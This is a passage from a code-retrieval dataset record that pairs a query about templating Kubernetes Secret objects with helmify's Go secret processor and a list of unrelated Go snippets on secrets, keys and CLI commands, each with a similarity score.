ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.Volumes = ls\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"yaml\"); ok && !configMethodChoiceTypeFound {\n\n\t\tconfigMethodChoiceTypeFound = true\n\t\tconfigMethodChoiceInt := &ves_io_schema_k8s_pod_security_policy.CreateSpecType_Yaml{}\n\n\t\tcreateSpec.ConfigMethodChoice = configMethodChoiceInt\n\n\t\tconfigMethodChoiceInt.Yaml = v.(string)\n\n\t}\n\n\tlog.Printf(\"[DEBUG] Creating Volterra K8SPodSecurityPolicy object with struct: %+v\", createReq)\n\n\tcreateK8SPodSecurityPolicyResp, err := client.CreateObject(context.Background(), ves_io_schema_k8s_pod_security_policy.ObjectType, createReq)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error creating K8SPodSecurityPolicy: %s\", err)\n\t}\n\td.SetId(createK8SPodSecurityPolicyResp.GetObjSystemMetadata().GetUid())\n\n\treturn resourceVolterraK8SPodSecurityPolicyRead(d, meta)\n}", "func New() helmify.Processor {\n\treturn &crd{}\n}", "func createContainerRegistrySecret(testBuild *utils.TestBuild) {\n\tsecretName := os.Getenv(EnvVarImageRepoSecret)\n\tsecretPayload := os.Getenv(EnvVarSourceRepoSecretJSON)\n\tif secretName == \"\" || secretPayload == \"\" {\n\t\tLogf(\"Container registry secret won't be created.\")\n\t\treturn\n\t}\n\n\t_, err := testBuild.LookupSecret(types.NamespacedName{Namespace: testBuild.Namespace, Name: secretName})\n\tif err == nil {\n\t\tLogf(\"Container registry secret is found at '%s/%s'\", testBuild.Namespace, secretName)\n\t\treturn\n\t}\n\n\tpayload := []byte(secretPayload)\n\tsecret := &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tNamespace: testBuild.Namespace,\n\t\t\tName: secretName,\n\t\t},\n\t\tType: corev1.SecretTypeDockerConfigJson,\n\t\tData: map[string][]byte{\n\t\t\t\".dockerconfigjson\": payload,\n\t\t},\n\t}\n\n\tLogf(\"Creating container-registry secret '%s/%s' (%d bytes)\", testBuild.Namespace, secretName, len(payload))\n\terr = testBuild.CreateSecret(secret)\n\tExpect(err).ToNot(HaveOccurred(), \"on creating container registry secret\")\n}", "func New() (*SecretsManager, error) {\n\tp := session.NewProvider()\n\tsess, err := p.Default()\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &SecretsManager{\n\t\tsecretsManager: secretsmanager.New(sess),\n\t\tsessionRegion: *sess.Config.Region,\n\t}, nil\n}", "func createSecrets(ctx context.Context, srcInfo *scanner.SourceInfo, appName string) error {\n\tif srcInfo == nil || len(srcInfo.Secrets) == 0 {\n\t\treturn nil\n\t}\n\n\tvar err error\n\tio := iostreams.FromContext(ctx)\n\tsecrets := map[string]string{}\n\n\tfor _, secret := range srcInfo.Secrets {\n\t\tval := \"\"\n\t\t// If a secret should be a random default, just generate it without displaying\n\t\t// Otherwise, prompt to type it in\n\t\tif secret.Generate != nil {\n\t\t\tif val, err = secret.Generate(); err != nil {\n\t\t\t\treturn fmt.Errorf(\"could not generate random string: %w\", err)\n\t\t\t}\n\t\t} else if secret.Value != \"\" {\n\t\t\tval = secret.Value\n\t\t} else {\n\t\t\tprompt := fmt.Sprintf(\"Set secret %s:\", secret.Key)\n\t\t\tsurveyInput := &survey.Input{Message: prompt, Help: secret.Help}\n\t\t\tsurvey.AskOne(surveyInput, &val)\n\t\t}\n\n\t\tif val != \"\" {\n\t\t\tsecrets[secret.Key] = val\n\t\t}\n\t}\n\n\tif len(secrets) > 0 {\n\t\tapiClient := client.FromContext(ctx).API()\n\t\t_, err := apiClient.SetSecrets(ctx, appName, secrets)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfmt.Fprintf(io.Out, \"Set secrets on %s: %s\\n\", appName, strings.Join(lo.Keys(secrets), \", \"))\n\t}\n\treturn nil\n}", "func (f *Factory) New(providerConf digitalocean.Config, clusterState *cluster.State) (provider.Activity, error) {\n\tk8s := &K8s{}\n\tk8s.moduleDir = filepath.Join(config.Global.ProjectRoot, \"terraform/digitalocean/\"+myName)\n\tk8s.backendKey = \"states/terraform-\" + myName + \".state\"\n\tk8s.backendConf = digitalocean.BackendSpec{\n\t\tBucket: providerConf.ClusterName,\n\t\tKey: k8s.backendKey,\n\t\tEndpoint: providerConf.Region + \".digitaloceanspaces.com\",\n\t}\n\trawProvisionerData, err := yaml.Marshal(providerConf.Provisioner)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"error occurret while marshal provisioner config: %s\", err.Error())\n\t}\n\tif err = yaml.Unmarshal(rawProvisionerData, &k8s.config); err != nil {\n\t\treturn nil, fmt.Errorf(\"error occurret while parsing provisioner config: %s\", err.Error())\n\t}\n\n\tk8s.config.ClusterName = providerConf.ClusterName\n\tk8s.config.Region = providerConf.Region\n\n\tk8s.terraform, err = executor.NewTerraformRunner(k8s.moduleDir, provisioner.GetAwsAuthEnv()...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tk8s.terraform.LogLabels = append(k8s.terraform.LogLabels, fmt.Sprintf(\"cluster='%s'\", providerConf.ClusterName))\n\treturn k8s, nil\n}", "func NewSecretService(ctx *core.Context) *SecretService {\n\treturn &SecretService{\n\t\tlog: log.New(log.Writer(), \"[Secrets] \", 0),\n\t\terr: nil,\n\t\tctx: ctx,\n\t}\n}", "func NewCmdCreateSecretGeneric(f cmdutil.Factory, cmdOut io.Writer) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"generic NAME [--type=string] [--from-file=[key=]source] [--from-literal=key1=value1] [--dry-run]\",\n\t\tShort: i18n.T(\"Create a secret from a local file, directory or literal value\"),\n\t\tLong: secretLong,\n\t\tExample: secretExample,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\terr := CreateSecretGeneric(f, cmdOut, cmd, args)\n\t\t\tcmdutil.CheckErr(err)\n\t\t},\n\t}\n\tcmdutil.AddApplyAnnotationFlags(cmd)\n\tcmdutil.AddValidateFlags(cmd)\n\tcmdutil.AddPrinterFlags(cmd)\n\tcmdutil.AddGeneratorFlags(cmd, cmdutil.SecretV1GeneratorName)\n\tcmd.Flags().StringSlice(\"from-file\", []string{}, \"Key files can be specified using their file path, in which case a default name will be given to them, or optionally with a name and file path, in which case the given name will be used. Specifying a directory will iterate each named file in the directory that is a valid secret key.\")\n\tcmd.Flags().StringArray(\"from-literal\", []string{}, \"Specify a key and literal value to insert in secret (i.e. mykey=somevalue)\")\n\tcmd.Flags().String(\"from-env-file\", \"\", \"Specify the path to a file to read lines of key=val pairs to create a secret (i.e. a Docker .env file).\")\n\tcmd.Flags().String(\"type\", \"\", i18n.T(\"The type of secret to create\"))\n\treturn cmd\n}", "func (s *Secret) FromRuntime(obj interface{}, config CtorConfig) {\n\tsecret := obj.(*corev1.Secret)\n\tglog.V(19).Infof(\"Reading meta %#v\", secret)\n\ts.FromObjectMeta(secret.ObjectMeta, config)\n\ts.secretType = string(secret.Type)\n\ts.data = strconv.Itoa(len(secret.Data))\n}", "func Secret[T SupportedTypes](key string, defavlt T) T {\n\tv := Value(key, defavlt)\n\tos.Unsetenv(key)\n\treturn v\n}", "func New(client SecretsManagerAPI, options ...option) sidecred.SecretStore {\n\ts := &store{\n\t\tclient: client,\n\t\tsecretTemplate: \"/{{ .Namespace }}/{{ .Name }}\",\n\t}\n\tfor _, optionFunc := range options {\n\t\toptionFunc(s)\n\t}\n\treturn s\n}", "func (s Keygen) Secret() *party.Secret {\n\treturn &party.Secret{\n\t\tID: s.selfID,\n\t}\n}", "func (p2pkc *P2PKeysController) Create(c *gin.Context) {\n\tkey, err := p2pkc.App.GetKeyStore().P2P().Create()\n\tif err != nil {\n\t\tjsonAPIError(c, http.StatusInternalServerError, err)\n\t\treturn\n\t}\n\tjsonAPIResponse(c, presenters.NewP2PKeyResource(key), \"p2pKey\")\n}", "func NewSecret(secret string, expireAfterViews, expireAfter int) (Secret, error) {\n\tvar result Secret\n\tresult.Hash = GenHashKey()\n\tresult.CreatedAt = time.Now()\n\n\tif secret == \"\" {\n\t\treturn Secret{}, ErrEmptySecret\n\t}\n\tresult.SecretText = secret\n\n\tif expireAfterViews < 1 {\n\t\treturn Secret{}, ErrInvalidExpireAfterViews\n\t}\n\tresult.RemainingViews = expireAfterViews\n\n\tif expireAfter < 0 {\n\t\treturn Secret{}, ErrInvalidExpireAfter\n\t}\n\n\tif expireAfter > 0 {\n\t\tresult.ExpiresAt = result.CreatedAt.Add(time.Duration(expireAfter) * time.Minute)\n\t}\n\n\treturn result, nil\n}", "func New(ctx resource.Context, cfg echo.Config) (i echo.Instance, err error) {\n\terr = resource.UnsupportedEnvironment(ctx.Environment())\n\n\tctx.Environment().Case(environment.Native, func() {\n\t\ti, err = native.New(ctx, cfg)\n\t})\n\n\tctx.Environment().Case(environment.Kube, func() {\n\t\ti, err = kube.New(ctx, cfg)\n\t})\n\treturn\n}", "func NewSecretCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"secret\",\n\t\tShort: \"Generate a cryptographically secure secret key which is typically used for cookie sessions.\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tbytes := make([]byte, 64)\n\t\t\tif _, err := rand.Read(bytes); err != nil {\n\t\t\t\tlogger.Fatal(err)\n\t\t\t}\n\n\t\t\tfmt.Println(hex.EncodeToString(bytes))\n\t\t},\n\t}\n}", "func toSecret(spec *engine.Spec, from *engine.Secret) *v1.Secret {\n\treturn &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: from.Metadata.UID,\n\t\t},\n\t\tType: \"Opaque\",\n\t\tStringData: map[string]string{\n\t\t\tfrom.Metadata.UID: from.Data,\n\t\t},\n\t}\n}", "func (g *Guard) Secret(v []byte) (*Secret, error) {\n\tg.lock.Lock()\n\tdefer g.lock.Unlock()\n\n\tb, err := memguard.NewMutableFromBytes(v)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ts := Secret{\n\t\tbuffer: b,\n\t\tguard: g,\n\t}\n\n\tg.secrets = append(g.secrets, &s)\n\treturn &s, nil\n}", "func ExampleSecretsClient_BeginCreate() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armcdn.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tpoller, err := clientFactory.NewSecretsClient().BeginCreate(ctx, \"RG\", \"profile1\", \"secret1\", armcdn.Secret{\n\t\tProperties: &armcdn.SecretProperties{\n\t\t\tParameters: &armcdn.CustomerCertificateParameters{\n\t\t\t\tType: to.Ptr(armcdn.SecretTypeCustomerCertificate),\n\t\t\t\tSecretSource: &armcdn.ResourceReference{\n\t\t\t\t\tID: to.Ptr(\"/subscriptions/subid/resourcegroups/RG/providers/Microsoft.KeyVault/vault/kvName/secrets/certificatename\"),\n\t\t\t\t},\n\t\t\t\tSecretVersion: to.Ptr(\"abcdef1234578900abcdef1234567890\"),\n\t\t\t\tUseLatestVersion: to.Ptr(false),\n\t\t\t},\n\t\t},\n\t}, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\tres, err := poller.PollUntilDone(ctx, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to pull the result: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.Secret = armcdn.Secret{\n\t// \tName: to.Ptr(\"secret1\"),\n\t// \tType: to.Ptr(\"Microsoft.Cdn/profiles/secrets\"),\n\t// \tID: to.Ptr(\"/subscriptions/subid/resourcegroups/RG/providers/Microsoft.Cdn/profiles/profile1/secrets/secret1\"),\n\t// \tProperties: &armcdn.SecretProperties{\n\t// \t\tDeploymentStatus: to.Ptr(armcdn.DeploymentStatusNotStarted),\n\t// \t\tProvisioningState: to.Ptr(armcdn.AfdProvisioningStateSucceeded),\n\t// \t\tParameters: &armcdn.CustomerCertificateParameters{\n\t// \t\t\tType: to.Ptr(armcdn.SecretTypeCustomerCertificate),\n\t// \t\t\tCertificateAuthority: to.Ptr(\"Symantec\"),\n\t// \t\t\tExpirationDate: to.Ptr(\"2025-01-01T00:00:00-00:00\"),\n\t// \t\t\tSecretSource: &armcdn.ResourceReference{\n\t// \t\t\t\tID: to.Ptr(\"/subscriptions/subid/resourcegroups/RG/providers/Microsoft.KeyVault/vaults/keyvaultname/secrets/certificatename\"),\n\t// \t\t\t},\n\t// \t\t\tSecretVersion: to.Ptr(\"abcdef1234578900abcdef1234567890\"),\n\t// \t\t\tSubject: to.Ptr(\"*.contoso.com\"),\n\t// \t\t\tSubjectAlternativeNames: []*string{\n\t// \t\t\t\tto.Ptr(\"foo.contoso.com\"),\n\t// \t\t\t\tto.Ptr(\"www3.foo.contoso.com\")},\n\t// \t\t\t\tThumbprint: to.Ptr(\"ABCDEF1234567890ABCDEF1234567890ABCDEF12\"),\n\t// \t\t\t\tUseLatestVersion: to.Ptr(true),\n\t// \t\t\t},\n\t// \t\t},\n\t// \t}\n}", "func GenerateSecretAPIObjects(secretConfig *v1alpha1.SecretConfig) *corev1.Secret {\n\t// prepare Kubernetes Secret\n\tk8sSecret := &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{Name: secretConfig.Name, Namespace: secretConfig.Namespace},\n\t\tData: map[string][]byte{},\n\t}\n\tfor _, keyConfig := range secretConfig.Keys {\n\t\tk8sSecret.Data[keyConfig.Name] = keyConfig.Node.Value\n\t}\n\treturn k8sSecret\n\n}", "func New(key, secret string) Client {\n\tc := Client{key: key, secret: secret}\n\n\treturn c\n}", "func generateSplunkSecret() []byte {\n\treturn resources.GenerateSecret(secretBytes, 24)\n}", "func New(mockenv *common.MockEnvironment, storage storage.Storage) *MockService {\n\ts := &MockService{\n\t\tkube: mockenv.GetKubeClient(),\n\t\tstorage: storage,\n\t\tprojects: mockenv.GetProjects(),\n\t}\n\ts.v1 = &SecretsV1{MockService: s}\n\treturn s\n}", "func Get(ctx context.Context, name, namespace string, c kubernetes.Interface) (*v1.Secret, error) {\n\tsecret, err := c.CoreV1().Secrets(namespace).Get(ctx, name, metav1.GetOptions{})\n\tif err != nil {\n\t\treturn secret, fmt.Errorf(\"error getting kubernetes secret: %s\", err)\n\t}\n\treturn secret, nil\n}", "func New(p provider) *Command {\n\treturn &Command{\n\t\tctx: p,\n\t\texportPubKeyBytes: func(id string) ([]byte, error) {\n\t\t\tk, ok := p.KMS().(*localkms.LocalKMS)\n\t\t\tif !ok {\n\t\t\t\treturn nil, fmt.Errorf(\"kms is not LocalKMS type\")\n\t\t\t}\n\n\t\t\treturn k.ExportPubKeyBytes(id)\n\t\t},\n\t}\n}", "func New(_ logger.Logf, secretName string) (*Store, error) {\n\tc, err := kube.New()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcanPatch, err := c.CheckSecretPermissions(context.Background(), secretName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &Store{\n\t\tclient: c,\n\t\tcanPatch: canPatch,\n\t\tsecretName: secretName,\n\t}, nil\n}", "func New() Key {\n\treturn newFrom(cryptorand.Reader)\n}", "func New(cfg *Config) (*Cmd, error) {\n\t_, err := signatureAndHashAlgorithmByKeyType(cfg.Key.Type)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"key type %v is not supported\", cfg.Key.Type)\n\t}\n\n\tkh, err := cfg.KMS.Get(cfg.Key.ID)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"kms get kh: %w\", err)\n\t}\n\n\tpubBytes, err := cfg.KMS.ExportPubKeyBytes(cfg.Key.ID)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"export pub key bytes: %w\", err)\n\t}\n\n\tsetOfIssuers := map[string]struct{}{}\n\tfor _, issuer := range cfg.Issuers {\n\t\tsetOfIssuers[issuer] = struct{}{}\n\t}\n\n\tcfg.Key.kh = kh\n\n\treturn &Cmd{\n\t\tclient: cfg.Trillian,\n\t\tvdr: cfg.VDR,\n\t\tVCLogID: sha256.Sum256(pubBytes),\n\t\tlogID: cfg.LogID,\n\t\tkms: cfg.KMS,\n\t\tkey: cfg.Key,\n\t\tcrypto: cfg.Crypto,\n\t\tissuers: setOfIssuers,\n\t}, nil\n}", "func Create(password string, keyLen int) ([]byte, error) {\n\tsalt, err := crypto.GenerateSalt(16)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tpassword += os.Getenv(\"SCRYPT_PEPPER\")\n\n\tkey, err := scrypt.Key([]byte(password), salt, N, r, p, keyLen)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Appending the salt\n\tkey = append(key, salt...)\n\n\t// Encoding the params to be stored\n\tbuf := &bytes.Buffer{}\n\tfor _, elem := range [3]int{N, r, p} {\n\t\terr = binary.Write(buf, binary.LittleEndian, int32(elem))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tkey = append(key, buf.Bytes()...)\n\t\tbuf.Reset()\n\t}\n\n\treturn key, nil\n}" ]
[ "0.66797674", "0.6378324", "0.63245016", "0.631639", "0.6316075", "0.6300446", "0.62829036", "0.611341", "0.6105122", "0.60965884", "0.60490847", "0.6026435", "0.60210687", "0.60203475", "0.59663445", "0.5898095", "0.5892259", "0.5868871", "0.5848825", "0.58468777", "0.5845569", "0.584082", "0.57961166", "0.57893354", "0.57835376", "0.5706671", "0.56967986", "0.56958896", "0.56339926", "0.5623665", "0.5612864", "0.5581856", "0.5554442", "0.5551975", "0.55497736", "0.54919875", "0.5487738", "0.5483937", "0.54782975", "0.5445724", "0.5444498", "0.5432846", "0.5431487", "0.5383347", "0.53779685", "0.53569263", "0.53425527", "0.5340618", "0.5316683", "0.5302855", "0.53020704", "0.5297454", "0.5292554", "0.5289196", "0.52870864", "0.52855206", "0.52790964", "0.52750516", "0.5274588", "0.5262088", "0.5246167", "0.52455735", "0.52434194", "0.5237401", "0.5234747", "0.5231831", "0.52253354", "0.52198046", "0.5217395", "0.5193667", "0.51910824", "0.51817167", "0.5180581", "0.5170171", "0.515854", "0.5154522", "0.51382005", "0.51213586", "0.51064044", "0.5097402", "0.5096689", "0.5089051", "0.5081786", "0.50707", "0.5053813", "0.5034381", "0.50336736", "0.503231", "0.50319844", "0.5029625", "0.5027597", "0.50264716", "0.50248677", "0.50237507", "0.5014904", "0.50073075", "0.5006227", "0.5004358", "0.5003105", "0.49987593" ]
0.73855734
0
Process k8s Secret object into template. Returns false if not capable of processing given resource type.
func (d secret) Process(appMeta helmify.AppMetadata, obj *unstructured.Unstructured) (bool, helmify.Template, error) { if obj.GroupVersionKind() != configMapGVC { return false, nil, nil } sec := corev1.Secret{} err := runtime.DefaultUnstructuredConverter.FromUnstructured(obj.Object, &sec) if err != nil { return true, nil, errors.Wrap(err, "unable to cast to secret") } meta, err := processor.ProcessObjMeta(appMeta, obj) if err != nil { return true, nil, err } name := appMeta.TrimName(obj.GetName()) nameCamelCase := strcase.ToLowerCamel(name) secretType := string(sec.Type) if secretType != "" { secretType, err = yamlformat.Marshal(map[string]interface{}{"type": secretType}, 0) if err != nil { return true, nil, err } } values := helmify.Values{} var data, stringData string templatedData := map[string]string{} for key := range sec.Data { keyCamelCase := strcase.ToLowerCamel(key) if key == strings.ToUpper(key) { keyCamelCase = strcase.ToLowerCamel(strings.ToLower(key)) } templatedName, err := values.AddSecret(true, nameCamelCase, keyCamelCase) if err != nil { return true, nil, errors.Wrap(err, "unable add secret to values") } templatedData[key] = templatedName } if len(templatedData) != 0 { data, err = yamlformat.Marshal(map[string]interface{}{"data": templatedData}, 0) if err != nil { return true, nil, err } data = strings.ReplaceAll(data, "'", "") data = format.FixUnterminatedQuotes(data) } templatedData = map[string]string{} for key := range sec.StringData { keyCamelCase := strcase.ToLowerCamel(key) if key == strings.ToUpper(key) { keyCamelCase = strcase.ToLowerCamel(strings.ToLower(key)) } templatedName, err := values.AddSecret(false, nameCamelCase, keyCamelCase) if err != nil { return true, nil, errors.Wrap(err, "unable add secret to values") } templatedData[key] = templatedName } if len(templatedData) != 0 { stringData, err = yamlformat.Marshal(map[string]interface{}{"stringData": templatedData}, 0) if err != nil { return true, nil, err } stringData = strings.ReplaceAll(stringData, "'", "") stringData = format.FixUnterminatedQuotes(stringData) } return true, &result{ name: name + ".yaml", data: struct { Type string Meta string Data string StringData string }{Type: secretType, Meta: meta, Data: data, StringData: stringData}, values: values, }, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func isSecret(resource v1alpha1.BackingServiceResource) bool {\n\treturn strings.ToLower(resource.Group+\".\"+resource.Version+\".\"+resource.Kind) == \".v1.secret\"\n}", "func (regionEnv *RegionEnv) createSecret(deploymentName string) bool {\n\tgvk := schema.GroupVersionKind{Version: \"v1\", Kind: \"Secret\"}\n\tmapping, _ := regionEnv.Mapper.RESTMapping(gvk.GroupKind(), gvk.Version)\n\tdynamicInterface := regionEnv.DynamicClient.Resource(mapping.Resource).Namespace(regionEnv.Cfg.Namespace)\n\n\tsecretData := make(map[string]interface{})\n\tfor _, secretRef := range regionEnv.Secrets {\n\t\tif secretRef.Kind == \"container\" {\n\t\t\tsecretData[secretRef.Name] = base64.StdEncoding.EncodeToString([]byte(secretRef.Value))\n\t\t}\n\t}\n\n\t// Use Kubernetes labels to easily find and delete old secrets.\n\tsecret := unstructured.Unstructured{\n\t\tObject: map[string]interface{}{\n\t\t\t\"apiVersion\": \"v1\",\n\t\t\t\"kind\": \"Secret\",\n\t\t\t\"metadata\": map[string]interface{}{\n\t\t\t\t\"name\": fmt.Sprintf(\"%s-%s\", deploymentName, regionEnv.Cfg.SHA),\n\t\t\t\t\"labels\": map[string]interface{}{\n\t\t\t\t\t\"app\": deploymentName,\n\t\t\t\t\t\"sha\": regionEnv.Cfg.SHA,\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"data\": secretData,\n\t\t}}\n\n\t_, secretGetErr := dynamicInterface.Get(regionEnv.Context, secret.GetName(), metav1.GetOptions{})\n\n\t// Secret may already exist if this is a rollback.\n\tif secretGetErr == nil {\n\t\tregionEnv.Logger.Info(\"Secret already exists\")\n\t\treturn true\n\t}\n\tif !errors.IsNotFound(secretGetErr) {\n\t\tregionEnv.errf(\"Unexpected Secret get error\\n%s\", secretGetErr)\n\t\treturn false\n\t}\n\n\t_, secretErr := dynamicInterface.Create(regionEnv.Context, &secret,\n\t\tmetav1.CreateOptions{FieldManager: \"porter2k8s\"})\n\tif secretErr != nil {\n\t\tregionEnv.Errors = append(regionEnv.Errors, secretErr)\n\t\treturn false\n\t}\n\tregionEnv.Logger.Infof(\"Created Secret %s\", secret.GetName())\n\n\treturn true\n}", "func UnmarshalSecret(m map[string]json.RawMessage, result interface{}) (err error) {\n\t// Retrieve discriminator value to determine correct \"subclass\".\n\tvar discValue string\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &discValue)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"error unmarshalling discriminator property 'secret_type': %s\", err.Error())\n\t\treturn\n\t}\n\tif discValue == \"\" {\n\t\terr = fmt.Errorf(\"required discriminator property 'secret_type' not found in JSON object\")\n\t\treturn\n\t}\n\tif discValue == \"arbitrary\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalArbitrarySecret)\n\t} else if discValue == \"imported_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalImportedCertificate)\n\t} else if discValue == \"public_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPublicCertificate)\n\t} else if discValue == \"private_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPrivateCertificate)\n\t} else if discValue == \"kv\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalKVSecret)\n\t} else if discValue == \"iam_credentials\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalIAMCredentialsSecret)\n\t} else if discValue == \"username_password\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalUsernamePasswordSecret)\n\t} else {\n\t\terr = fmt.Errorf(\"unrecognized value for discriminator property 'secret_type': %s\", discValue)\n\t}\n\treturn\n}", "func Secret(objectMeta metav1.ObjectMeta, data map[string][]byte) *corev1.Secret {\n\treturn &corev1.Secret{\n\t\tObjectMeta: objectMeta,\n\t\tData: data,\n\t\tType: secretTypeForData(data),\n\t\tImmutable: pointer.Bool(true),\n\t}\n}", "func runTemplate(cr *ricobergerdev1alpha1.VaultSecret, tmpl string, secrets map[string][]byte) ([]byte, error) {\n\t// Set up the context\n\tsd := templateContext{\n\t\tSecrets: make(map[string]string, len(secrets)),\n\t\tVault: templateVaultContext{\n\t\t\tPath: cr.Spec.Path,\n\t\t\tAddress: os.Getenv(\"VAULT_ADDRESS\"),\n\t\t},\n\t\tNamespace: cr.Namespace,\n\t\tLabels: cr.Labels,\n\t\tAnnotations: cr.Annotations,\n\t}\n\n\t// For templating, these should all be strings, convert\n\tfor k, v := range secrets {\n\t\tsd.Secrets[k] = string(v)\n\t}\n\n\t// We need to exclude some functions for security reasons and proper working of the operator, don't use TxtFuncMap:\n\t// - no environment-variable related functions to prevent secrets from accessing the VAULT environment variables\n\t// - no filesystem functions? Directory functions don't actually allow access to the FS, so they're OK.\n\t// - no other non-idempotent functions like random and crypto functions\n\tfuncmap := sprig.HermeticTxtFuncMap()\n\tdelete(funcmap, \"genPrivateKey\")\n\tdelete(funcmap, \"genCA\")\n\tdelete(funcmap, \"genSelfSignedCert\")\n\tdelete(funcmap, \"genSignedCert\")\n\tdelete(funcmap, \"htpasswd\") // bcrypt strings contain salt\n\n\ttmplParser := template.New(\"data\").Funcs(funcmap)\n\n\t// use other delimiters to prevent clashing with Helm templates\n\ttmplParser.Delims(\"{%\", \"%}\")\n\n\tt, err := tmplParser.Parse(tmpl)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar bout bytes.Buffer\n\terr = t.Execute(&bout, sd)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn bout.Bytes(), nil\n}", "func (r *reconciler) hasSecret(meta metav1.Object, o runtime.Object) bool {\n\tic := o.(*operatorv1.IngressController)\n\tsecretName := controller.RouterEffectiveDefaultCertificateSecretName(ic, r.operandNamespace)\n\tsecret := &corev1.Secret{}\n\tif err := r.client.Get(context.Background(), secretName, secret); err != nil {\n\t\tif errors.IsNotFound(err) {\n\t\t\treturn false\n\t\t}\n\t\tlog.Error(err, \"failed to look up secret for ingresscontroller\", \"name\", secretName, \"related\", meta.GetSelfLink())\n\t}\n\treturn true\n}", "func (c crd) Process(appMeta helmify.AppMetadata, obj *unstructured.Unstructured) (bool, helmify.Template, error) {\n\tif obj.GroupVersionKind() != crdGVC {\n\t\treturn false, nil, nil\n\t}\n\tspecUnstr, ok, err := unstructured.NestedMap(obj.Object, \"spec\")\n\tif err != nil || !ok {\n\t\treturn true, nil, errors.Wrap(err, \"unable to create crd template\")\n\t}\n\tversions, _ := yaml.Marshal(specUnstr)\n\tversions = yamlformat.Indent(versions, 2)\n\tversions = bytes.TrimRight(versions, \"\\n \")\n\n\tres := fmt.Sprintf(crdTeml, obj.GetName(), appMeta.ChartName(), string(versions))\n\tname, _, err := unstructured.NestedString(obj.Object, \"spec\", \"names\", \"singular\")\n\tif err != nil || !ok {\n\t\treturn true, nil, errors.Wrap(err, \"unable to create crd template\")\n\t}\n\treturn true, &result{\n\t\tname: name + \"-crd.yaml\",\n\t\tdata: []byte(res),\n\t}, nil\n}", "func detectSecretType(s string) (v1.SecretType, error) {\n\tswitch strings.ToLower(s) {\n\tcase \"opaque\":\n\t\treturn v1.SecretTypeOpaque, nil\n\tcase \"kubernetes.io/basic-auth\":\n\t\treturn v1.SecretTypeBasicAuth, nil\n\tcase \"kubernetes.io/tls\":\n\t\treturn v1.SecretTypeTLS, nil\n\tcase \"kubernetes.io/ssh-auth\":\n\t\treturn v1.SecretTypeSSHAuth, nil\n\tcase \"kubernetes.io/service-account-token\":\n\t\treturn v1.SecretTypeServiceAccountToken, nil\n\tcase \"kubernetes.io/dockercfg\":\n\t\treturn v1.SecretTypeDockercfg, nil\n\tcase \"kubernetes.io/dockerconfigjson\":\n\t\treturn v1.SecretTypeDockerConfigJson, nil\n\t}\n\treturn \"\", errors.New(\"unknown secretType yet\")\n}", "func UnmarshalKVSecret(m map[string]json.RawMessage, result interface{}) (err error) {\n\tobj := new(KVSecret)\n\terr = core.UnmarshalPrimitive(m, \"created_by\", &obj.CreatedBy)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"created_at\", &obj.CreatedAt)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"crn\", &obj.Crn)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"custom_metadata\", &obj.CustomMetadata)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"description\", &obj.Description)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"downloaded\", &obj.Downloaded)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = 